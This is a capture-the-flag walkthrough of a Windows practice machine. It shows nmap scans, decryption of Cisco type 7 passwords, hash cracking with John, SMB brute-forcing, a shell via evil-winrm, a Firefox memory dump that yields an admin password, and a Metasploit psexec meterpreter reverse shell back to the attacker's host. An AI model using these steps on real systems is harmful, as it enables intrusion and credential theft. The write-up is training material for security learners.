This box was a mix of exploitation, enumeration, scripting, software configuration and forensics. If you don’t know what Winrm is and how its used (like me) you will struggle to get a shell on the system. I had great fun hacking it. 😊

I firstly scanned the box 10.10.10.149 using nmap with the following arguments.

[email protected]:~# nmap -A 10.10.10.149 -sS -P0-65565
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-19 16:28 BST
Nmap scan report for 10.10.10.149
Host is up (0.19s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE       VERSION
80/tcp  open  http          Microsoft IIS httpd 10.0
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp open  msrpc         Microsoft Windows RPC
445/tcp open  microsoft-ds?
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 39s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2019-09-19T15:29:50
|_  start_date: N/A

TRACEROUTE (using port 445/tcp)
HOP RTT       ADDRESS
1   199.93 ms 10.10.14.1
2   200.14 ms 10.10.10.149

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 92.03 seconds

We have a HTTP server (IIS 10.0) and SMB running on the box, interesting lets have a closer look at the SMB service? I am unsure what the targets OS is at the moment? Windows Server 2016?

Lets use search exploit and try and find any available exploits for the services running on the box?

[email protected]:~# searchsploit IIS 10
Exploits: No Result
Shellcodes: No Result
[email protected]:~# searchsploit msrpc
Exploits: No Result
Shellcodes: No Result

Nothing. 😒

Lets take a look at the web server, a login page, lets check to see if the forms are vulnerable to SQL injections.

Dead end.

Lets login as a guest and see what we have access to.

Support tickets great, we also have some usernames. Maybe related to the server? Lets save them to a users.txt. I am also going to add some fairly common usernames in there as well to help with the pentest.

users.txt
-------------
hazard
Support Admin
admin
Administrator

Lets look at the attachment.

Interesting a iOS config file, looks like we have some hashes and usernames in the config. Lets add the new usernames to our users.txt and add the hashes to hashes.txt.

users.txt
-------------
hazard
Support Admin
admin
Administrator
rout3r
hash.txt
-------------
$1$pdQG$o8nrSzsGXeaduXrjlvKc91

As you can see in the config there are two type 7 passwords, with a quick Google search you can see these are decryptable and should not be used.

0242114B0E143F015F5D1E161713
02375012182C1A1D751618034F36415408

Great now lets create a password.txt add the decrypted passwords to it.

[email protected]
Q4)sJu\Y8qz*A3?d

Lets have a crack at the last hash $1$pdQG$o8nrSzsGXeaduXrjlvKc91 with John the ripper and rockyou.txt as a wordlist.

[email protected]:~/Desktop# john hash.txt --wordlist=/usr/share/word-lists/rockyou.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
No password hashes left to crack (see FAQ)
[email protected]:~/Desktop# john hash.txt --show
?:stealth1agent

1 password hash cracked, 0 left

Lets add stealth1agent to our passwords.txt.

So we have some usernames and password at our disposal, lets try these against the Samba server to gain access? 😊

Module options (auxiliary/scanner/smb/smb_login):

   Name               Current Setting              Required  Description
   ----               ---------------              --------  -----------
   ABORT_ON_LOCKOUT   false                        yes       Abort the run when an account lockout is detected
   BLANK_PASSWORDS    false                        no        Try blank passwords for all users
   BRUTEFORCE_SPEED   5                            yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS       false                        no        Try each user/password couple stored in the current database
   DB_ALL_PASS        false                        no        Add all passwords in the current database to the list
   DB_ALL_USERS       false                        no        Add all users in the current database to the list
   DETECT_ANY_AUTH    false                        no        Enable detection of systems accepting any authentication
   DETECT_ANY_DOMAIN  false                        no        Detect if domain is required for the specified user
   PASS_FILE          /root/Desktop/passwords.txt  no        File containing passwords, one per line
   PRESERVE_DOMAINS   true                         no        Respect a username that contains a domain name.
   Proxies                                         no        A proxy chain of format type:host:port[,type:host:port][...]
   RECORD_GUEST       false                        no        Record guest-privileged random logins to the database
   RHOSTS             10.10.10.149                 yes       The target address range or CIDR identifier
   RPORT              445                          yes       The SMB service port (TCP)
   SMBDomain          .                            no        The Windows domain to use for authentication
   SMBPass                                         no        The password for the specified username
   SMBUser                                         no        The username to authenticate as
   STOP_ON_SUCCESS    false                        yes       Stop guessing when a credential works for a host
   THREADS            1                            yes       The number of concurrent threads
   USERPASS_FILE                                   no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS       false                        no        Try the username as the password for all users
   USER_FILE          /root/Desktop/users.txt      no        File containing usernames, one per line
   VERBOSE            true                         yes       Whether to print output for all attempts

Snipped.

[+] 10.10.10.149:445      - 10.10.10.149:445 - Success: '.\hazard:stealth1agent'
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\support:stealth1agent',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\support:[email protected]',

Sweet! Lets see if we can get a shell via PSEXEC? 😃

[*] Started reverse TCP handler on 10.10.14.43:4444 
[*] 10.10.10.149:445 - Connecting to the server...
[*] 10.10.10.149:445 - Authenticating to 10.10.10.149:445 as user 'hazard'...
[-] 10.10.10.149:445 - Exploit failed [no-access]: RubySMB::Error::UnexpectedStatusCode STATUS_ACCESS_DENIED
[*] Exploit completed, but no session was created.

Nope… 😒

At this point I had to run to the forums for some advice, the box did have winrm running as a service which runs on 5985 but it did not appear in my first nmap scan? This really through me off but some google searching shows when you scan a windows box with winrm running, there is a “security by obscurity” option which will not show the port being open with a full scan but with a explicit scan nmap -p 5985 10.10.10.149 the port shows up fine.

I then used a tool called evil-winrm for getting a shell via winrm.

[email protected]:~/Desktop/evil-winrm# ruby evil-winrm.rb -i 10.10.10.149 -u hazard -p 'stealth1agent'

Info: Starting Evil-WinRM shell v1.6

Info: Establishing connection to remote endpoint

Error: Can't establish connection. Check connection params

Error: Exiting with code 1

…Maybe this user is not configured to use winrm. We do have access to the Samba server so lets enumerate to find more users on the server and we could try and hack into with the passwords we have?

I used the impacket tool lookupsid.py to enumerate what users are on the server.

500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)

Brilliant, more usernames lets add these to our users.txt and try another smb login.

users.txt
-------------
Administrator
admin
hazard
support
Chase
Jason
[+] 10.10.10.149:445      - 10.10.10.149:445 - Success: '.\hazard:stealth1agent'
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\support:stealth1agent',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\support:[email protected]',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\support:Q4)sJu\Y8qz*A3?d',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\Chase:stealth1agent',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\Chase:[email protected]',
[+] 10.10.10.149:445      - 10.10.10.149:445 - Success: '.\Chase:Q4)sJu\Y8qz*A3?d'

We have another account, sound! Lets try it with evil-winrm and see if we get a shell!

[email protected]:~/Desktop/evil-winrm# ruby evil-winrm.rb -i 10.10.10.149 -u cahse -p 'Q4)sJu\Y8qz*A3?d'

Info: Starting Evil-WinRM shell v1.6

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Chase\Documents> 

🙌🙌🙌SHELL TIME🙌🙌🙌

Lets get the user flag!

*Evil-WinRM* PS C:\Users\Chase\Desktop> dir


    Directory: C:\Users\Chase\Desktop


Mode                LastWriteTime         Length Name                                                                                                                                                                                                    
----                -------------         ------ ----                                                                                                                                                                                                    
-a----        4/22/2019   9:08 AM            121 todo.txt                                                                                                                                                                                                
-a----        4/22/2019   9:07 AM             32 user.txt                                                                                                                                                                                                


*Evil-WinRM* PS C:\Users\Chase\Desktop> type user.txt
a127daef77ab6d9d92008653295f59c4

Now we have access lets getsystem on this box!

Lets have a look at the processes?

*Evil-WinRM* PS C:\Users\Chase\Desktop> Get-Process

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName                                                                                                                                                                                    
-------  ------    -----      -----     ------     --  -- -----------    
   1148      68   119328     452360      23.86   1100   1 firefox                                                                                                                                                                                        
    341      19     9980     263768       0.58   2228   1 firefox                                                                                                                                                                                        
    408      31    16964     292972       2.44   6356   1 firefox                                                                                                                                                                                        
    390      30    29208      61632      24.77   6736   1 firefox                                                                                                                                                                                        
    358      26    16468      37692       0.70   6900   1 firefox 

Very weird, a server running a web browser? A web browser does have usernames and passwords saved though. Lets go full forensics and dump the firefox process and see if we find anything interesting!

Copyright (C) 2009-2017 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

[18:53:16] Dump 1 initiated: C:\Users\Chase\Documents\firefox.exe_190920_185316.dmp
[18:53:17] Dump 1 writing: Estimated dump file size is 457 MB.
[18:53:20] Dump 1 complete: 457 MB written in 4.4 seconds

Lets use powershell to search for pass strings in the dump.

*Evil-WinRM* PS C:\Users\Chase\Documents> Select-String -Pattern "pass" -Path firefox.exe_190920_185316.dmp
firefox.exe_190920_185316.dmp:10570:C:\Windows\System32\KERNELBASE.dll��F�(��@�\Sessions\1\Windows\ApiPortectio��O�"C:\P
rogram Files\Mozilla Firefox\firefox.exe" localhost/[email protected]&login_password=4dD!5}x/re8]FBuZ&login=
localhost/[email protected]&login_password=4dD!5}x/re8]FB

Bingo! The login for the support page! Lets add 4dD!5}x/re8]FBuZ to our passwords.txt and try the SMB logins again!

[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\Administrator:[email protected]',
[-] 10.10.10.149:445      - 10.10.10.149:445 - Failed: '.\Administrator:Q4)sJu\Y8qz*A3?d',
[+] 10.10.10.149:445      - 10.10.10.149:445 - Success: '.\Administrator:4dD!5}x/re8]FBuZ' Administrator

🙌🙌🙌Root time🙌🙌🙌

Lets PSExec in the box and get a root shell!

msf5 exploit(windows/smb/psexec) > set rhosts 10.10.10.149
rhosts => 10.10.10.149
msf5 exploit(windows/smb/psexec) > set smbpass 4dD!5}x/re8]FBuZ
smbpass => 4dD!5}x/re8]FBuZ
msf5 exploit(windows/smb/psexec) > set smbuser Administrator
smbuser => Administrator
msf5 exploit(windows/smb/psexec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/psexec) > set lport 5555
lport => 5555
msf5 exploit(windows/smb/psexec) > set lhost 10.10.14.43 
lhost => 10.10.14.43
msf5 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 10.10.14.43:5555 
[*] 10.10.10.149:445 - Connecting to the server...
[*] 10.10.10.149:445 - Authenticating to 10.10.10.149:445 as user 'Administrator'...
[*] 10.10.10.149:445 - Selecting PowerShell target
[*] 10.10.10.149:445 - Executing the payload...
[+] 10.10.10.149:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (179779 bytes) to 10.10.10.149
[*] Meterpreter session 1 opened (10.10.14.43:5555 -> 10.10.10.149:49691) at 2019-09-20 15:10:42 +0100

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

Lets get the flag!

meterpreter > shell
Process 4588 created.
Channel 2 created.
Microsoft Windows [Version 10.0.17763.437]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop>type root.txt
type root.txt
50dfa3c6bfd20e2e0d071b073d766897

Conclusion

Don’t allow sensitive data like support tickets to be viewed without authentication, use stronger passwords and correct password generation techniques. Not type 7! Don’t use web browsers in sensitive environments like a server, and use firewalls and IDS to prevent bruteforcing of SMB logins.

Thanks for reading. 😊😊😊😊

Reference

Leave a comment

Your email address will not be published. Required fields are marked *